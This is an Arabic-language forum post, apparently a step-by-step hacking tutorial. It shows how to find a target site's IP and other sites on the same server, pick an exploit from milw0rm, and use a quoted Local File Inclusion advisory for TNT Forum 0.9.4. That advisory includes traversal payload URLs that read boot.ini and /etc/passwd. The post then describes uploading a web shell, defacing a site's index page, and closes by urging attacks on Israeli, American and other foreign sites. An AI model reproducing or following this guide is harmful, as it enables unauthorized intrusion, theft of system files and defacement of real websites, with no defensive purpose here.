بسم الله الرحمن الرحيم
السلام عليكم جميعآ
خخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخخ
وناسه هل شرح
ههههههههههههههههه فولكانو الحقني يا بوي
ستوني الحقني
خخخخخخخخخخخخخخخخخخ
فلاش يالله وراي ههههههههههههه
اقول لا يكثر هههههههه
ابيك تركز زين وتفهمني ..قفل المسن والجوال كمان واذا فيه احد عندك بالغرفه طلعه وخليك بجو هاااااااادئ عشان تركز<~~ماتحس انك طولتها هههههههه يالله..^_^
بـسم آلله _- نبدأ-_
آول شي لآزم نعرف آلموقع على آي سيرفر
والسيرفر معنآه ( خآدم )
ونطلع آلآي بي (ip) آلموووقع
رآح تقولي يااستكنان كيف آطلع كل هذا ؟؟
آقولك روح لي (( آبدأ (start) ــــ> وبعدين لي تشغيل (ren) ـــ> بعدين آكتب cmd
رآح تطلع لك شآشه سودآ
بعين آكتب ping
وبعدين رآبط آلموقع بدون (vb) ولآ(http)
يعني كذا ping www.xxxx.com
ولاتنسى آلمسآفه بين ping ورآبط آلموقع
_-_-_-_-_-_-_-_-_-_-_-_-_-_-
وبعدين تطلع لك آرقآم كثيره كلهآ نفس الشي
خذ آول آلآرقآم وحفظه
وبعدين روح لي
www.live.com
آو
www.msn.com
وكتب كذا :
علمآ آن XXXXX آي بي آلموقع ( ip)
آلحين طلعنآ آلسيرفر وخلصنآ رآح تقولي
شلون آبي آخترق آلحين ؟؟؟؟؟؟؟؟؟؟؟؟ ip:XXXXXXXXX
آقولك يآطويل العمر
روح للموقع هذا :
http://www.milw0rm.com/
ودور آخر آلثغرآآت
ورآح تقولي آنآ لقيت ثغره وشلون آخترق آلموقع آلحين .؟.؟
آقولك آدخل على آول وحد يعني آول موضوع
رآح تطلع لك شآشه بيضآء مكتوب عليهآ نفس كذآ :
================================================== ====
TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
================================================== ====
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 10 June 2008
SITE : www.citec.us
################################################## ###
APPLICATION : TNT Forum
VERSION : 0.9.4
DOWNLOAD : download.tntforum.tuttoeniente.net
################################################## ###
---LFI---
################################################## ###############
Vulnerable in index.php:
137: //Variabili generali
138: $modulo = @$____['modulo'];
139: $modfile = 'mod_'.$modulo.'.php';
################################################## ###############
Exploit:
[+] For Windows
http://[tar___]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00
[+] For Linux
http://localhost/tntforum/index.php?.../etc/passwd%00
################################################## ################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
################################################## ################
# milw0rm.com [2008-06-10]
آدري آنك مآفهمت شي
آلحين روح دور على كلمة :
آذآ لقيتهآ رآح تلقآ جنبهآ آو تحتها آستغلال آلثغره ( آلآستغلال هو آهم شي ومآيحتآج شرح )
وهذآ هو آلآستغلال : Example
http://localhost/tntforum/index.php?.../etc/passwd%00
هذآ تحطه بعد رآبط آلموقع على طول يعني يصير كذآ :
http://xxxx.com/tntforum/index.php?m.../etc/passwd%00
علمآ آن آخر كلمة بعد علآمه = هذي=../../../../../../../../الشل
ولآ تنسى تكتب آخر شي "؟" علامة ؟ هي آهم شي هالعلامه (؟)
نفضر آننآ طلعنآ آلسيرفر وطلعنآ آلآي بي ip وطلعنآ آلثغره وآلآستغلآل
نفتضر آن آلرآبط طلع خطأ!!!!
معنآتهآ آن آلثغره مرقعه يعني مآيصير
تروح لي للموضوع آلثآني وآنت تدوور على آلآستغلال
آلحين آنت تقولي من وين آجيب آلشل ؟.
آقول روح دور بمواضيع المنتدا تلقا
_-__-_-_-_-_-_--_--_------
آنت آلحين تقولي آنآ رفعت آلشل آلحين
وش آسوي ؟؟؟؟؟؟؟؟؟؟ووش آلفآيده آلحين .؟؟؟؟؟
وش آلفآيده ؟ آنك آلحين تشوف كل ملفآت آلموقع بس وتحذف وتعدل بس بشرط !!!!!
آذآ كآنت حآلتك root على آلسيرفر فأنت آلملك آلحين !
وذآ كآنت حآلتك فآنت وزير الملك
وآذآ كآنت حآلتكuser
فآنت زآئر مآتقدر تعدل ولآ تحذف آلآعلى آلموقع آلي عليها تصريح (777)
تقدر تسوي آلي تبي !
وتقولي شلون آدري آن فيه موآقع عليها تصريح (777)
آقولك رآح يكون لونهآ آخضر !
ولحين رآح تقولي وش آسوي آبي آخترق آلموقع !
رآح آقولك آدخل على آلموقع آلي تبيه
وبعدين روح لي UP وبعدين آستعرآض وبعدين آندكس آلآخترآآآآآق
________________________________
ومبروووووووووووووووووك آخترقت آلموقع
هذا الي عندي <<~~~اذا عجبكم الموضوع لا تبخلو بالتقييم
ارجو ان التجريب يكون ع مواقع اسرائليه ولا امريكيه ولا اجنبيه اهم شي اني ابري نفسي
مع السلامه ـ
juhg dhlfj]h 10]rhdr ,j;,k i;v l,hru :)